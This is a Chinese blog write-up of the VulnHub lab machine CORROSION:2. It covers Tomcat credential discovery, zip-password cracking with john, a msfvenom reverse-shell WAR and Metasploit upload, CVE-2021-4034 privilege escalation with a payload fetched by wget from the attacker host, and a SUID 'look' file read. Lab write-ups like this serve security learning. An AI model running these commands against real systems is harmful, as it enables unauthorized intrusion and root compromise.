vulnhub靶场——CORROSION:2

最新推荐文章于 2024-01-10 21:47:32 发布
最新推荐文章于 2024-01-10 21:47:32 发布
阅读量3.1k 收藏 7
点赞数 3
分类专栏: vulnhub靶场 文章标签: 安全 linux java 靶机 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Czheisenberg/article/details/122969392
版权

准备

攻击机: kali

靶机: CORROSION: 2 NAT 192.168.91.0 网段

下载连接:

https://www.vulnhub.com/entry/corrosion-2,745/

信息搜集与利用

主机发现

如图所示得到目标靶机IP地址: 192.168.91.189

端口扫描

nmap -sV -O -p- -T4 -A 192.168.91.189 --oN corronsion_nmap.txt


如图所示开放了: 22,80(apache2 default),8080(tomcat) 共三个端口,由此可见这个靶机网页由java构成。根据之前做过的tomcat靶机来说,进入 manager 后台,然后上传war包来反弹shell。

HTTP

http://192.168.91.189/

http://192.168.91.189:8080/

目录扫描

python3 dirsearch.py -u http://192.168.91.189:8080/

可疑文件

从扫描结果出来有一大堆的东西。其中 docs,examples 这两样是tomcat自带的文档和示例。

我们来查看一下 readme.txt 和 backup.zip。

http://192.168.91.189:8080/readme.txt

其中说到,给了一个谁也找不到的文件(放屁)用密码打开此文件,那么就是指 backup.zip 文件,将其下载下来。

wget http://192.168.91.189:8080/backup.zip

unzip backup.zip


如图所示确实需要密码

密码破解

zip2john backup.zip > password_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt password_hash.txt



如图所示得到密码:@administrator_hi5,很快就出来了。

现在解压
unzip backup.zip

如图所示解压成功,很多文件

经过一番查找在 tomcat-users.xml 文件最下面发现了用户名和密码:

manager:melehifokivai

admin:melehifokivai

这两个用户名都能登陆 tomcat 后台,分别用两个浏览器登陆。

既然登陆了后台,我们尝试上传一个 war 包然后反弹shell.

制作 war 包可以看我以前的博客

https://www.ohhhhhh.top/2021/12/29/web渗透——My-Tomcat-HOST-1/

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.27.243.168 LPORT=4444 -f war > shell.war

kali 开启 nc 监听,然后上传(将 shell.war 拷贝到 win11中)
nc -lvnp 4444



去她娘的 404, 看来这个方法不得行。md

之后发现 msfconsole 中有一个可以 getshell 的模块配合账号密码即可。
use exploit/multi/http/tomcat_mgr_upload


设置红框的内容即可,账号密码在上面已经拿到。

然后** run **



run 之后,输入 shell 进入 shell 可疑看到为 tomcat 用户。

python3 -c "import pty;pty.spawn(’/bin/bash’)"

输入此命令得到标准的终端

flag 1

在目录 /home/randy 中有第一个 flag : user.txt

/home/randy/note.txt

嘿,兰迪,这是你的系统管理员,希望你今天过得愉快!我只是想让你知道
我更改了你对主目录的权限。您暂时无法删除或添加文件。
稍后我将更改这些权限。
下周一见randy!

查看一下 /etc/passwd 中可存在的用户

方法一

发现 jaye 用户的密码和 manager 的密码一样都是 : melehifokivai

find / -perm -u=s -type f 2>/dev/null

查找 具有 SUID 的命令发现了一个熟悉的: polkit-agent-helper-1 cve编号:
CVE-2021-4034

exp连接:

https://github.com/berdav/CVE-2021-4034

发现靶机上没有 git 命令,但是可以用 wget 替代,最后发现还没有 make 命令,那么编译不了,但是我们可以在kali上将已经编译好的文件,下载到靶机中,然后运行,以后遇到类似的直接上传已经编译好的文件。

将编译好的文件下载到靶机中:

wget http://172.27.243.168:8000/CVE-2021-4034.zip


然后解压
unzip CVE-2021-4034.zip

然后进入 CVE-2021-4034文件夹,运行 ./cve-2021-4034,不出意外的话就会拿到 root 权限

如图所示拿到了root 权限,至此又又又通过 CVE-2021-4034 提权成功,不亏是存在了十多年的漏洞!!!

flag 2

方法二

jaye:melehifokivai ssh 登陆后,在其家目录下 File 中有 look 命令,可以越权访问文件:
./look ‘’ '/root/root.txt’


如图所示直接读取第二个 flag , 如果在比赛中直接提交 flag 即可得分。

方法三

参考大佬的博客:

https://www.cnblogs.com/sainet/p/15668420.html#三提权

我这里测试失败,可能是我的原因。

总结

  1. CVE-2021-4034
  2. look 越权读取文件
  3. msfconsole use exploit/multi/http/tomcat_mgr_upload getshell
    /sainet/p/15668420.html#%E4%B8%89%E6%8F%90%E6%9D%83)

    我这里测试失败,可能是我的原因。

总结

  1. CVE-2021-4034
  2. look 越权读取文件
  3. msfconsole use exploit/multi/http/tomcat_mgr_upload getshell
Czheisenberg
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
VulnHub靶场-Corrosion:1
hxync的博客
08-14 631
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
Corrosion:使用机器学习预测腐蚀速率
05-10
"Corrosion: 使用机器学习预测腐蚀速率"这个项目聚焦于利用这种技术来解决材料腐蚀的问题,这是工程领域的一大挑战。腐蚀会降低设备的寿命,增加维护成本,因此准确预测腐蚀速率对于预防性维护和设计更耐腐蚀的材料...
VulnHUb日记(十四): Corrosion:2
Dawn_Xi的博客
11-25 453
参考链接 Vulnhub:Corrosion:2 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.135 fping 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.135 开启了80和8080两个http服务,分别访问 gobuster 枚举目录,在8080端口目录下 gobuster dir --url 192.168.56.135:8080 -w /usr/share/seclists/Disco
vulnhub-Corrosion: 2
qq_43006864的博客
05-12 508
Corrosion: 2 ~ VulnHub 靶机Corrosion: 2 ~ VulnHub 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap -sS -sV -A -p- 192.168.1.108 主机开放了三个端口。 访问一下80和8080 分别是Apache和Tomcat中间件的界面。没啥发现,开始目.
Corrosion_2
追求卓越,技术流~
01-19 3763
这里写自定义目录标题靶场环境信息收集漏洞利用权力提升总结 靶场环境 攻击机:Kali IP:192.168.247.129 靶机Corrosion_2 IP:192.168.247.137 信息收集 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 07:56 EST Nmap scan report for 192.168.247.137 Host is up (0.00078s latency). Not shown: 65532 clos
Vulnhub靶机Corrosion 2
最新发布
qq_48904485的博客
01-10 939
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
corrosion:用于Rust的高性能缓存库
03-05
2. **主要数据结构** - **HashMap缓存**:基于哈希映射的数据结构,提供键值对的快速查找和存储。 - **LinkedList缓存**:用于实现LRU策略,按访问顺序排列缓存项,最近最少使用的项会被优先移除。 3. **API使用...
corrosion:一组用于Rust的测试实用程序
05-13
2. **测试覆盖率**:虽然Rust标准库不直接提供覆盖率工具,但corrosion可能集成了第三方库,帮助开发者测量代码覆盖率,从而了解测试的全面性。 3. **模拟和依赖注入**:在复杂的系统中,测试往往需要隔离和控制...
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
vulnhub靶机-Corrosion:2
臭nana的博客
05-03 647
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22、80和8080端口
Vulnhub靶场CORROSION: 2
DG_s1mple
02-12 2086
环境准备 下载好靶机后导入到vmware里面 这没啥好说的 题目没给IP地址需要我们自己探测 攻击机IP地址为:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用arp-scan命令扫描靶机的IP地址 使用namp扫描靶机开放的端口 靶机开放了ssh和tomcat 渗透开始 首先访问80端口 很正常的一个页面,没有什么有用的信息,扫描路径也没有什么有用的结果 我们再访问8080端口 是一个tomcat的页面,我们也扫描一下路径 我们访问一下readme.txt
Vulnhub靶场 Corrosion: 2靶机 渗透练习一
weixin_52244898的博客
07-07 1009
前期准备: 靶机地址:Corrosion: 2 ~ VulnHub kali攻击机ip:192.168.122.128 靶机地址:192.168.122.143 一、信息收集 1.使用 netdiscover 探测目标 ip 2.使用 nmap 对目标靶机进行端口扫描 发现开放了22端口(ssh)、80端口(http)和8080端口(http) 3. 80 端口 访问 80 端口: 很正常的一个页面,没发现什么可利用信息 扫描一下目........
[渗透测试学习靶机04] vulnhub靶场 Corrosion: 2
weixin_47112073的博客
10-17 608
渗透测试学习靶机04-vulnhub靶场 Corrosion: 2本次靶机难度:中等。
VulnHub日记(四):Corrosion
Dawn_Xi的博客
08-13 295
靶机介绍 难度:容易 对于初学者来说,这是一个简单的盒子,但不太容易。祝你好运 提示:枚举属性 虚拟机链接:https://www.vulnhub.com/entry/corrosion-1,730/ 开始练习 本机ip:192.168.56.102 使用nmap找出靶机ip:192.168.56.105 nmap -sS -sV 192.168.56.0/24 查看开启端口及服务 nmap -A -p- 192.168.56.105 看到开启80和22端口,先使用浏览器访问.
靶机渗透练习37-Corrosion2
hirak0的博客
04-18 966
靶机描述 靶机地址:https://www.vulnhub.com/entry/corrosion-2,745/ Description Difficulty: Medium Hint: Enumeration is key. 一、搭建靶机环境 攻击机Kali: IP地址:192.168.184.128 靶机: IP地址:192.168.184.147 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 二、实战 2.1网络扫描 2.1.1 启动靶机和K
corrosion 靶机(ffuf模糊测试,命令执行)
m0_66299232的博客
01-13 883
4.因为22端口开放,又有文件泄露漏洞,那么就可以利用22端口把木马写入auth.log文件里,造成命令执行。4.下载下来后,进行解压不成功需要密码,使用fcrackzip进行破解密码。2.访问网页1发现/archives下面有俩个文件,访问后有一个php文件。1.由于没有找到可利用信息,将linpeas.sh下载下来,进行探测。2.找到一个user_backup.zip文件,应该是一个用户的备份!3.既然这个命令是三个小命令合起来的 ,那么就有三种提权方法!6.开启监听,执行命令,反弹shell成功。
Corrosion2 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-31 856
Corrosion2 靶场渗透记录~ 提权太难懂~~~~~~
Corrosion2( 侵蚀)靶机
m0_66299232的博客
10-02 576
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码。sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本;5.sudo -l 发现一个.py文件有权限,查看.py文件后发现,他一直调用base64。2.gzip -d rockyou.txt.gz //解压字典里的密码文件。虚拟机网络链接模式:桥接模式。将文件下载下来进行解压!
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值